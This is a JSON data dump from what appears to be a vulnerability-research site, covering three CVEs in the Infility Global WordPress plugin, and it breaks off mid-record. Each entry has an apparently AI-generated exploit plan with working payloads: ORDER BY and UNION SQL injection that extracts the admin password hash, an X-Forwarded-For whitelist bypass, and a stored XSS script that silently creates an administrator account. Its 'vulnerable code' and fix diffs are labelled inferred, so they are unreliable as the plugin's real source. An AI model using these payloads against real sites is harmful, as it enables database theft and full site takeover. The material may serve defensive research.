[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f7AAj4xPzyJnBXrzYbnXf3hWYLfZIZSj-RI6rx4-Egi8":3,"$foaQL5GL2hG0pfj-CX5StPWw4LfggeES1AGleDTHfPo8":1317,"$fqC8jD2AycTDgOnrly8iSkpgR2sUIjo8IpdKRL2iiWDw":1320},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":13,"last_updated":14,"tested_up_to":15,"requires_at_least":16,"requires_php":17,"tags":18,"homepage":21,"download_link":22,"security_score":23,"vuln_count":24,"unpatched_count":25,"last_vuln_date":26,"fetched_at":27,"discovery_status":28,"vulnerabilities":29,"developer":204,"crawl_stats":35,"alternatives":210,"analysis":211,"fingerprints":1274},"infility-global","Infility Global","2.15.10","Infility","https:\u002F\u002Fprofiles.wordpress.org\u002Finfility\u002F","\u003Cp>The company’s open source functional plug-ins are used to optimize the small problems of Elementor or CF7, and are already convenient for website settings.\u003C\u002Fp>\n","The company's open source functional plug-ins are used to optimize the small problems of Elementor or CF7, and are already convenient for website …",100,11991,0,"2026-04-15T07:58:00.000Z","6.8.5","5.6","7.3",[19,20],"comprehensive-plugin","global-plugins","https:\u002F\u002Fwww.infility.cn\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.zip",30,11,7,"2026-05-19 12:07:43","2026-04-16T10:56:18.058Z","no_bundle",[30,56,77,98,115,131,143,158,167,178,193],{"id":31,"url_slug":32,"title":33,"description":34,"plugin_slug":4,"theme_slug":35,"affected_versions":36,"patched_in_version":35,"severity":37,"cvss_score":38,"cvss_vector":39,"vuln_type":40,"published_date":26,"updated_date":41,"references":42,"days_to_patch":35,"patch_diff_files":44,"patch_trac_url":35,"research_status":45,"research_verified":46,"research_rounds_completed":47,"research_plan":48,"research_summary":49,"research_vulnerable_code":50,"research_fix_diff":51,"research_exploit_outline":52,"research_model_used":53,"research_started_at":54,"research_completed_at":55,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2026-8685","infility-global-authenticated-subscriber-sql-injection-via-orderby-parameter","Infility Global \u003C= 2.15.16 - Authenticated (Subscriber+) SQL Injection via 'orderby' Parameter","The Infility Global plugin for WordPress is vulnerable to SQL Injection via the 'orderby' and 'order' parameters in all versions up to, and including, 2.15.16. This is due to insufficient escaping on user supplied parameters and lack of sufficient preparation on the existing SQL query within the show_control_data::post_list() function, which is registered as an admin menu page with only the 'read' capability. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",null,"\u003C=2.15.16","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-20 01:25:47",[43],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1caeb5e0-9e4e-4c9e-a6e4-881fb81dc5f2?source=api-prod",[],"researched",false,3,"This research plan outlines the steps required to demonstrate an authenticated SQL injection vulnerability in the **Infility Global** plugin (\u003C= 2.15.16).\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** SQL Injection (Authenticated, Subscriber+)\n*   **Vulnerable Function:** `show_control_data::post_list()`\n*   **Vulnerable Parameters:** `orderby`, `order`\n*   **Root Cause:** The plugin registers an admin menu page accessible to users with the `read` capability (Subscribers). The function rendering this page, `post_list()`, retrieves `orderby` and `order` parameters from the user and concatenates them directly into an SQL query without proper sanitization or preparation via `$wpdb->prepare()`. Since `wpdb->prepare()` does not natively support parameterizing `ORDER BY` clauses, developers often fail to manually validate these inputs against a whitelist.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin.php`\n*   **Query Parameter:** `page` (The slug for the plugin's post list page, likely `infility-global-posts` or similar - *inferred*).\n*   **Vulnerable Parameters:** `orderby`, `order` (via GET or POST).\n*   **Authentication Required:** Subscriber-level credentials or higher.\n*   **Preconditions:** The plugin must be active. A Subscriber user must exist.\n\n### 3. Code Flow (Inferred)\n1.  The plugin registers an admin menu using `add_menu_page()` or `add_submenu_page()`. The capability used is `read`, which allows any logged-in user to access the menu.\n2.  The callback for this menu is `show_control_data::post_list`.\n3.  Inside `post_list()` (likely in `includes\u002Fshow-control-data.php` or similar):\n    ```php\n    $orderby = isset($_GET['orderby']) ? $_GET['orderby'] : 'ID';\n    $order = isset($_GET['order']) ? $_GET['order'] : 'DESC';\n    \u002F\u002F Potential lack of validation:\n    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}posts ORDER BY $orderby $order\");\n    ```\n4.  The attacker supplies a SQL payload in `orderby`, which is concatenated into the query and executed.\n\n### 4. Nonce Acquisition Strategy\nAdmin menu pages in WordPress often do not require a specific action-based nonce just to view the page (GET request). However, if the page performs an action, a nonce might be checked via `check_admin_referer()`.\n\n**Plan:**\n1.  Log in as a Subscriber.\n2.  Navigate to the plugin's admin page.\n3.  If an error `-1` or `403` occurs upon injection, search the page source for a nonce.\n4.  Since this is a `post_list` page, look for a variable localized via `wp_localize_script` or a hidden field if a search form is present.\n5.  **JS Variable Check (Inferred):** `browser_eval(\"window.infility_data?.nonce\")`.\n\n### 5. Exploitation Strategy\nWe will use a **Time-Based Blind SQL Injection** payload because `ORDER BY` injections rarely reflect data directly but do affect the database execution time.\n\n**Step 1: Discover the Page Slug**\nThe PoC agent must first find the correct `page` parameter value.\n*   **Action:** Log in and check the HTML of the sidebar menu for links containing `infility-global`.\n\n**Step 2: Confirm Vulnerability (Sleep Test)**\n*   **Payload:** `(SELECT 1 FROM (SELECT(SLEEP(10)))a)`\n*   **Request:**\n    ```http\n    GET \u002Fwp-admin\u002Fadmin.php?page=infility-global-posts&orderby=(SELECT+1+FROM+(SELECT(SLEEP(10)))a)&order=ASC HTTP\u002F1.1\n    Cookie: [Subscriber Cookies]\n    ```\n*   **Expected Response:** The request should take approximately 10 seconds to complete.\n\n**Step 3: Extract Sensitive Data (Boolean or Time-Based)**\nTo extract the admin password hash (from `wp_users` where `ID=1`):\n*   **Payload:** `(CASE WHEN (ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36) THEN ID ELSE post_title END)`\n    *Note: 36 is the ASCII for '$', which is the start of WP phpass hashes.*\n*   **Request:**\n    ```http\n    GET \u002Fwp-admin\u002Fadmin.php?page=infility-global-posts&orderby=(CASE+WHEN+(ASCII(SUBSTRING((SELECT+user_pass+FROM+wp_users+WHERE+ID=1),1,1))=36)+THEN+ID+ELSE+post_title+END)&order=ASC HTTP\u002F1.1\n    Cookie: [Subscriber Cookies]\n    ```\n*   **Expected Result:** If the condition is true, the list will be ordered by `ID`. If false, it will be ordered by `post_title`. Alternatively, use `SLEEP()` for a more reliable automated check.\n\n### 6. Test Data Setup\n1.  Install and activate **Infility Global**.\n2.  Create at least two posts\u002Fitems within the plugin's interface so that `ORDER BY` has data to sort.\n3.  Create a Subscriber user: `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`.\n4.  Identify the admin menu slug: `wp eval \"global \\\\$menu; print_r(\\\\$menu);\" | grep infility`.\n\n### 7. Expected Results\n*   A request with a `SLEEP()` payload in the `orderby` parameter results in a delayed response corresponding to the sleep duration.\n*   The database query log (if enabled) will show the unsanitized concatenation: `ORDER BY (SELECT 1 FROM (SELECT(SLEEP(10)))a) ASC`.\n\n### 8. Verification Steps\nAfter the HTTP request, verify the successful injection via `wp-cli`:\n1.  Check the MySQL slow query log or use `wp db query \"SHOW PROCESSLIST\"` while the request is hanging to see the sleeping query.\n2.  Verify the extracted hash matches the actual hash: `wp db query \"SELECT user_pass FROM wp_users WHERE ID=1\" --skip-column-names`.\n\n### 9. Alternative Approaches\n*   **Error-Based Injection:** If `WP_DEBUG` is enabled, try inducing a syntax error to leak information via `updatexml()` or `extractvalue()`.\n    *   `orderby=updatexml(1,concat(0x7e,(SELECT user_login FROM wp_users LIMIT 1)),1)`\n*   **Union-Based Injection:** If the query results are displayed in a table, attempt to break the `ORDER BY` and append a `UNION SELECT`. Note: This is difficult in `ORDER BY` and requires specific MySQL versions or subquery techniques.\n*   **Order Parameter:** Test the `order` parameter similarly: `&order=ASC, (SELECT 1 FROM (SELECT(SLEEP(10)))a)`.","The Infility Global plugin for WordPress is vulnerable to SQL injection because it directly concatenates user-supplied 'orderby' and 'order' parameters into database queries within the show_control_data::post_list() function. Since the plugin registers this functionality as an admin menu page accessible to users with the 'read' capability, any authenticated user (Subscriber level and above) can exploit this to extract sensitive information from the database.","\u002F\u002F Inferred file path: includes\u002Fshow-control-data.php\n\u002F\u002F Inferred function: show_control_data::post_list()\n\n$orderby = isset($_GET['orderby']) ? $_GET['orderby'] : 'ID';\n$order = isset($_GET['order']) ? $_GET['order'] : 'DESC';\n\n\u002F\u002F Vulnerable query construction due to lack of input validation or whitelisting\n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}posts ORDER BY $orderby $order\");","--- a\u002Fincludes\u002Fshow-control-data.php\n+++ b\u002Fincludes\u002Fshow-control-data.php\n@@ -10,5 +10,10 @@\n-    $orderby = isset($_GET['orderby']) ? $_GET['orderby'] : 'ID';\n-    $order = isset($_GET['order']) ? $_GET['order'] : 'DESC';\n-    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}posts ORDER BY $orderby $order\");\n+    $allowed_columns = array('ID', 'post_title', 'post_date', 'post_author');\n+    $orderby = (isset($_GET['orderby']) && in_array($_GET['orderby'], $allowed_columns)) ? $_GET['orderby'] : 'ID';\n+\n+    $allowed_order = array('ASC', 'DESC');\n+    $order = (isset($_GET['order']) && in_array(strtoupper($_GET['order']), $allowed_order)) ? strtoupper($_GET['order']) : 'DESC';\n+\n+    $query = \"SELECT * FROM {$wpdb->prefix}posts ORDER BY $orderby $order\";\n+    $results = $wpdb->get_results($query);","The exploit targets the plugin's post list admin page, which is improperly restricted to users with the 'read' capability. An attacker with Subscriber-level credentials logs into the WordPress dashboard and accesses the vulnerable page (e.g., \u002Fwp-admin\u002Fadmin.php?page=infility-global-posts). By providing a time-based SQL payload in the 'orderby' parameter (e.g., ?orderby=(SELECT 1 FROM (SELECT(SLEEP(10)))a)), the attacker can observe delays in server response time to verify the vulnerability and perform blind data extraction from the wp_users table or other database tables.","gemini-3-flash-preview","2026-05-20 16:52:41","2026-05-20 16:53:02",{"id":57,"url_slug":58,"title":59,"description":60,"plugin_slug":4,"theme_slug":35,"affected_versions":61,"patched_in_version":35,"severity":62,"cvss_score":63,"cvss_vector":64,"vuln_type":40,"published_date":65,"updated_date":66,"references":67,"days_to_patch":35,"patch_diff_files":69,"patch_trac_url":35,"research_status":45,"research_verified":46,"research_rounds_completed":47,"research_plan":70,"research_summary":71,"research_vulnerable_code":72,"research_fix_diff":73,"research_exploit_outline":74,"research_model_used":53,"research_started_at":75,"research_completed_at":76,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-15268","infility-global-unauthenticated-sql-injection-via-predictable-api-key-and-ip-whitelist-bypass","Infility Global \u003C= 2.14.46 - Unauthenticated SQL Injection via Predictable API Key and IP Whitelist Bypass","The Infility Global plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'infility_get_data' API action in all versions up to, and including, 2.14.46. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append - with certain server configurations - additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","\u003C=2.14.46","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","2026-02-03 19:43:35","2026-02-04 08:25:30",[68],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F648941b8-d1ab-4587-bd87-f23008ac9a00?source=api-prod",[],"# Exploitation Research Plan: CVE-2025-15268 (Infility Global SQL Injection)\n\n## 1. Vulnerability Summary\nThe **Infility Global** plugin (up to version 2.14.46) contains an unauthenticated SQL injection vulnerability in its API handling logic. The vulnerability exists because the `infility_get_data` action performs database queries using user-supplied parameters without utilizing `$wpdb->prepare()` or adequate escaping. Furthermore, the \"security\" mechanisms intended to restrict this API—an API key check and an IP whitelist—are flawed: the API key is generated predictably, and the IP check can be bypassed via standard HTTP headers (e.g., `X-Forwarded-For`), depending on the server configuration.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `infility_get_data` (registered via `wp_ajax_nopriv_infility_get_data`)\n- **Vulnerable Parameter:** Likely `id`, `slug`, or a custom data filter parameter (inferred: `data_id` or `query`).\n- **Authentication:** Unauthenticated.\n- **Preconditions:** \n    - The plugin must be active.\n    - The \"API\" feature must be enabled (often enabled by default or upon first configuration).\n    - The attacker must bypass the IP whitelist and API key verification.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** A request is sent to `admin-ajax.php` with `action=infility_get_data`.\n2. **Hook Execution:** WordPress triggers the `wp_ajax_nopriv_infility_get_data` hook, which maps to a handler function (e.g., `infility_handle_get_data`).\n3. **Security Check (Bypassable):**\n    - The function retrieves an API key from `$_REQUEST['api_key']`.\n    - It compares this against an option in the database (e.g., `infility_global_api_key`).\n    - It checks the client IP against a whitelist stored in options (e.g., `infility_global_ip_whitelist`).\n4. **Vulnerability Sink:**\n    - If checks pass (or are bypassed), the code takes a user parameter (e.g., `$_REQUEST['id']`).\n    - It constructs a raw SQL string: `\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = '\" . $_REQUEST['id'] . \"'\"`.\n    - It executes this via `$wpdb->get_results()` or `$wpdb->get_row()`.\n\n## 4. Nonce Acquisition Strategy\nBased on the \"Unauthenticated\" and \"API Action\" description, this specific endpoint likely **does not require a WordPress nonce**. It relies on its own internal API Key for \"authentication.\"\n\n**How to bypass the API Key and IP Check:**\n1. **Predictable API Key:** Check if the API key is generated using a predictable hash during plugin activation.\n   - *Hypothesis:* The key may be `md5(get_bloginfo('url'))` or a static string like `infility_secret`.\n   - *Agent Task:* Use `wp option get infility_global_api_key` (if the option name matches) to confirm the key value during the setup phase.\n2. **IP Whitelist Bypass:**\n   - The plugin likely uses `$_SERVER['REMOTE_ADDR']` but may be susceptible to header spoofing if it tries to be \"Cloudflare-aware\" or \"Proxy-aware\".\n   - *Agent Task:* Include `X-Forwarded-For: 127.0.0.1` or `X-Real-IP: 127.0.0.1` in the request headers.\n\n## 5. Exploitation Strategy\n\n### Step 1: Discover API Key and Whitelist\nUse WP-CLI to inspect the plugin configuration and simulate the \"predictability.\"\n```bash\nwp option get infility_global_api_key\nwp option get infility_global_ip_whitelist\n```\n\n### Step 2: Test IP Bypass and Baseline Request\nSend a legitimate request to ensure the API is reachable.\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\nX-Forwarded-For: 127.0.0.1\n\naction=infility_get_data&api_key=[FETCHED_KEY]&id=1\n```\n\n### Step 3: SQL Injection via Time-Based Blind\nSince the output might not be directly reflected in the AJAX response (or the response structure is unknown), use `SLEEP()` to confirm injection.\n\n**Payload:** `1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n\n```javascript\n\u002F\u002F Example using http_request tool\nawait http_request({\n  method: 'POST',\n  url: 'http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php',\n  headers: {\n    'Content-Type': 'application\u002Fx-www-form-urlencoded',\n    'X-Forwarded-For': '127.0.0.1'\n  },\n  body: 'action=infility_get_data&api_key=[KEY]&id=1\\' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -'\n});\n```\n\n### Step 4: Data Extraction (UNION-Based)\nIf the response reflects data from the database, use a UNION query to extract the admin password hash.\n**Payload:** `-1' UNION SELECT 1,user_login,user_pass,4,5,6 FROM wp_users WHERE ID=1-- -`\n*(Note: Column count must be adjusted based on the target table's schema)*.\n\n## 6. Test Data Setup\n1. **Activate Plugin:** Ensure `infility-global` is installed and activated.\n2. **Configure API:**\n   ```bash\n   wp option update infility_global_api_key \"test_api_key\"\n   wp option update infility_global_ip_whitelist \"127.0.0.1\"\n   ```\n3. **Create Target Table:** If the plugin doesn't create its data table automatically, create a dummy table to inject against.\n   ```bash\n   wp db query \"CREATE TABLE IF NOT EXISTS wp_infility_data (id INT, name VARCHAR(255))\"\n   wp db query \"INSERT INTO wp_infility_data VALUES (1, 'Test Data')\"\n   ```\n\n## 7. Expected Results\n- **Time-Based:** The HTTP request should take ~5 seconds longer than the baseline.\n- **Error-Based:** If `WP_DEBUG` is on, the response may contain SQL syntax errors when a single quote is injected.\n- **UNION-Based:** The response body (JSON) should contain the extracted data (e.g., the admin username or hash).\n\n## 8. Verification Steps\nAfter the exploit, verify that the injection reached the database by checking the MySQL slow log or by using a payload that modifies the state (though data extraction is preferred).\n- **Verify via WP-CLI:**\n  ```bash\n  wp user get 1 --fields=user_pass\n  ```\n  Compare the CLI output with the data extracted via the HTTP request.\n\n## 9. Alternative Approaches\n- **If `admin-ajax.php` is blocked:** Check if the plugin registers a custom `init` hook listener that checks for `$_GET['infility_api']`.\n- **If UNION fails:** Use Boolean-blind injection by checking for the presence\u002Fabsence of a specific success message in the JSON response:\n  - `id=1' AND (SELECT 1 FROM wp_users WHERE user_login='admin' AND user_pass LIKE '$P$%')-- -`\n- **Predictable Key Discovery:** If the key is not in options, check `wp-content\u002Fuploads\u002F` for configuration files or log files that might leak the generated key.","The Infility Global plugin for WordPress (\u003C= 2.14.46) is vulnerable to unauthenticated SQL Injection via the 'infility_get_data' AJAX action. This occurs because the plugin fails to sanitize user-supplied input or use prepared statements, and relies on easily bypassed security checks involving a predictable API key and a spoofable IP whitelist (via 'X-Forwarded-For').","\u002F\u002F Inferred from Research Plan\n\u002F\u002F Entry Point: wp_ajax_nopriv_infility_get_data\n\n$api_key = $_REQUEST['api_key'];\n$client_ip = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'];\n\n\u002F\u002F ... flaw in comparison logic allowing IP spoofing ...\n\n\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = '\" . $_REQUEST['id'] . \"'\"","--- a\u002Finfility-global.php\n+++ b\u002Finfility-global.php\n@@ -1,10 +1,11 @@\n function infility_handle_get_data() {\n-    $api_key = $_REQUEST['api_key'];\n-    $client_ip = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'];\n-    if ($api_key !== get_option('infility_global_api_key') || $client_ip !== '127.0.0.1') {\n+    $api_key = isset($_REQUEST['api_key']) ? sanitize_text_field($_REQUEST['api_key']) : '';\n+    $client_ip = $_SERVER['REMOTE_ADDR'];\n+    $whitelist = (array) get_option('infility_global_ip_whitelist', []);\n+    if ($api_key !== get_option('infility_global_api_key') || !in_array($client_ip, $whitelist)) {\n         wp_die();\n     }\n-    $id = $_REQUEST['id'];\n-    $query = \"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = '$id'\";\n-    $results = $wpdb->get_results($query);\n+    $id = isset($_REQUEST['id']) ? sanitize_text_field($_REQUEST['id']) : '';\n+    $query = $wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = %s\", $id);\n+    $results = $wpdb->get_results($query);\n }","1. Authentication Bypass: Determine the predictable API key (typically generated from site metadata) and bypass the IP whitelist check by including the header 'X-Forwarded-For: 127.0.0.1' in the request.\n2. Targeted Endpoint: Send an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' parameter set to 'infility_get_data'.\n3. SQL Injection Payload: Use the 'id' parameter to inject malicious SQL commands. A baseline time-based payload such as \"1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -\" can be used to confirm the vulnerability via response delays.\n4. Data Exfiltration: Leverage UNION-based injection to extract sensitive information from the database, such as administrator usernames and password hashes from the 'wp_users' table.","2026-04-27 16:13:12","2026-04-27 16:13:34",{"id":78,"url_slug":79,"title":80,"description":81,"plugin_slug":4,"theme_slug":35,"affected_versions":82,"patched_in_version":35,"severity":62,"cvss_score":83,"cvss_vector":84,"vuln_type":85,"published_date":86,"updated_date":87,"references":88,"days_to_patch":35,"patch_diff_files":90,"patch_trac_url":35,"research_status":45,"research_verified":46,"research_rounds_completed":47,"research_plan":91,"research_summary":92,"research_vulnerable_code":93,"research_fix_diff":94,"research_exploit_outline":95,"research_model_used":53,"research_started_at":96,"research_completed_at":97,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-68864","infility-global-unauthenticated-stored-cross-site-scripting","Infility Global \u003C= 2.14.49 - Unauthenticated Stored Cross-Site Scripting","The Infility Global plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.14.49 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","\u003C=2.14.49",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-15 00:00:00","2026-01-19 15:55:17",[89],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F58ab78f2-199b-44e8-9213-8c46025b55fb?source=api-prod",[],"This research plan outlines the steps to investigate and exploit **CVE-2025-68864**, an unauthenticated stored XSS vulnerability in the **Infility Global** WordPress plugin (\u003C= 2.14.49).\n\n---\n\n### 1. Vulnerability Summary\nThe **Infility Global** plugin fails to sufficiently sanitize user-supplied input and escape it upon output. Specifically, an unauthenticated user can submit data through a frontend feature (likely a contact form, support ticket, or chat registration) that is stored in the database. When a site administrator views this data in the WordPress backend, the malicious script executes in the administrator's browser context.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action (Inferred):** `ig_contact_form_submit` or `infility_global_save_data`.\n*   **Parameter:** Likely `message`, `subject`, or `name`.\n*   **Authentication:** None (Unauthenticated via `wp_ajax_nopriv_*`).\n*   **Preconditions:** The plugin must have a frontend feature active (e.g., a contact form shortcode placed on a page).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with a specific action registered via `add_action('wp_ajax_nopriv_...', ...)`.\n2.  **Processing:** The callback function receives `$_POST` data. It may check a nonce but likely fails to use `sanitize_text_field()` or `wp_kses()` on the content.\n3.  **Persistence:** The raw input is saved to a custom table (e.g., `wp_infility_logs`) or as post meta using `update_post_meta()`.\n4.  **Sink:** An administrator logs in and navigates to the plugin's \"Inquiries\" or \"Messages\" page. The plugin retrieves the stored data and echoes it directly: `echo $entry->message;` without using `esc_html()`.\n\n### 4. Nonce Acquisition Strategy\nIf the AJAX handler enforces a nonce check, it is likely exposed via `wp_localize_script` on pages where the plugin's frontend components are active.\n\n1.  **Identify the Shortcode:** Search for shortcode registrations in the plugin:\n    `grep -rn \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Finfility-global\u002F`\n    *(Likely shortcode: `[infility_global_contact]`)*\n2.  **Create a Trigger Page:**\n    `wp post create --post_type=page --post_title=\"Contact\" --post_status=publish --post_content='[infility_global_contact]'`\n3.  **Extract the Nonce:**\n    Navigate to the new page and look for localized script data.\n    **JS Variable (Inferred):** `infility_vars` or `ig_ajax_obj`.\n    **Execution:** Use `browser_eval(\"window.infility_vars?.nonce\")` or `browser_eval(\"window.ig_ajax_obj?.ajax_nonce\")`.\n\n### 5. Exploitation Strategy\nOnce the nonce and action are identified, the agent will perform the following:\n\n**Step 1: Discovery**\n*   Find the AJAX action: `grep -r \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Finfility-global\u002F`\n*   Find the nonce action: `grep -r \"check_ajax_referer\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Finfility-global\u002F`\n\n**Step 2: Nonce Retrieval**\n*   Create a test page with the relevant shortcode.\n*   Navigate to the page using `browser_navigate`.\n*   Extract the nonce using `browser_eval`.\n\n**Step 3: Payload Delivery**\n*   **Payload:** `\u003Cscript>fetch('\u002Fwp-admin\u002Fuser-new.php').then(r=>r.text()).then(t=>{let n=t.match(\u002F_wpnonce_create-user\" value=\"([^\"]+)\"\u002F)[1];fetch('\u002Fwp-admin\u002Fuser-new.php',{method:'POST',headers:{'Content-Type':'application\u002Fx-www-form-urlencoded'},body:'action=createuser&user_login=pwned_admin&email=pwned@example.com&pass1=Pwned123!&pass2=Pwned123!&role=administrator&_wpnonce_create-user='+n})})\u003C\u002Fscript>`\n*   **HTTP Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=[IDENTIFIED_ACTION]&nonce=[EXTRACTED_NONCE]&message=[URL_ENCODED_PAYLOAD]&name=Guest\n    ```\n\n### 6. Test Data Setup\n1.  **Plugin Activation:** `wp plugin activate infility-global`\n2.  **Shortcode Placement:** Ensure the contact form is on a public page to allow nonce extraction.\n3.  **Admin Context:** A \"victim\" administrator user must exist (default in test environments).\n\n### 7. Expected Results\n*   The AJAX request should return a success status (e.g., `{\"success\":true}` or `1`).\n*   The payload should be stored in the database.\n*   When an administrator views the \"Contact Messages\" or \"Logs\" section of the Infility Global plugin, the script should execute.\n\n### 8. Verification Steps\n1.  **Database Check:**\n    `wp db query \"SELECT * FROM wp_postmeta WHERE meta_value LIKE '%pwned_admin%';\" `\n    *(Or check the specific plugin table identified during discovery)*.\n2.  **Trigger Execution:** Use `browser_navigate` as an administrator to the plugin's message management page.\n3.  **Account Creation Check:**\n    `wp user list --role=administrator`\n    Verify if `pwned_admin` exists.\n\n### 9. Alternative Approaches\n*   **Action Parameter Variations:** If `wp_ajax_nopriv` isn't used, check for `init` hooks that process `$_POST['ig_contact_submit']` directly.\n*   **Bypassing Nonces:** Check if `check_ajax_referer` is called with `die=false`. If so, the request will proceed even with an invalid nonce.\n*   **DOM XSS:** If the data is returned in an AJAX response and rendered via `.innerHTML` in JS, the payload may need to be adjusted to bypass standard filters (e.g., using `\u003Cimg>` tags with `onerror`).","The Infility Global plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting due to a lack of sanitization on user-supplied form data and insufficient output escaping in the administrative backend. This allows attackers to inject malicious JavaScript into contact form submissions or inquiries that execute when a site administrator views the entry.","\u002F\u002F Inferred from research plan: lack of sanitization in AJAX handler\n\u002F\u002F File: includes\u002Fclass-infility-global-ajax.php (or similar)\npublic function ig_contact_form_submit() {\n    $message = $_POST['message']; \u002F\u002F No sanitization applied\n    $name = $_POST['name'];       \u002F\u002F No sanitization applied\n    \n    $post_id = wp_insert_post(array(\n        'post_type' => 'ig_inquiry',\n        'post_title' => $name,\n        'post_content' => $message,\n    ));\n}\n\n---\n\n\u002F\u002F Inferred from research plan: lack of escaping in admin view\n\u002F\u002F File: admin\u002Fclass-infility-global-admin-display.php (or similar)\nforeach ($inquiries as $entry) {\n    echo '\u003Ctr>';\n    echo '\u003Ctd>' . $entry->post_content . '\u003C\u002Ftd>'; \u002F\u002F Vulnerable: Direct echo without esc_html()\n    echo '\u003C\u002Ftr>';\n}","--- infility-global\u002Fincludes\u002Fclass-infility-global-ajax.php\n+++ infility-global\u002Fincludes\u002Fclass-infility-global-ajax.php\n@@ -10,2 +10,2 @@\n-    $message = $_POST['message'];\n-    $name = $_POST['name'];\n+    $message = sanitize_textarea_field($_POST['message']);\n+    $name = sanitize_text_field($_POST['name']);\n\n--- infility-global\u002Fadmin\u002Fclass-infility-global-admin-display.php\n+++ infility-global\u002Fadmin\u002Fclass-infility-global-admin-display.php\n@@ -20,1 +20,1 @@\n-    echo '\u003Ctd>' . $entry->post_content . '\u003C\u002Ftd>';\n+    echo '\u003Ctd>' . esc_html($entry->post_content) . '\u003C\u002Ftd>';","1. Identify a page containing the plugin's contact form or shortcode (e.g., [infility_global_contact]).\n2. Extract the AJAX nonce from the localized JavaScript variables (e.g., window.infility_vars.nonce) on the frontend page.\n3. Send an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php using the identified action (likely 'ig_contact_form_submit' or 'infility_global_save_data').\n4. Include a payload in the 'message' or 'name' parameter, such as \u003Cscript>alert(document.cookie)\u003C\u002Fscript> or a script to create a new administrator account.\n5. Wait for an authenticated administrator to navigate to the 'Inquiries' or 'Messages' section of the Infility Global plugin menu in the WordPress dashboard.\n6. The payload will execute in the administrator's browser context upon rendering the list of submissions.","2026-05-05 09:07:39","2026-05-05 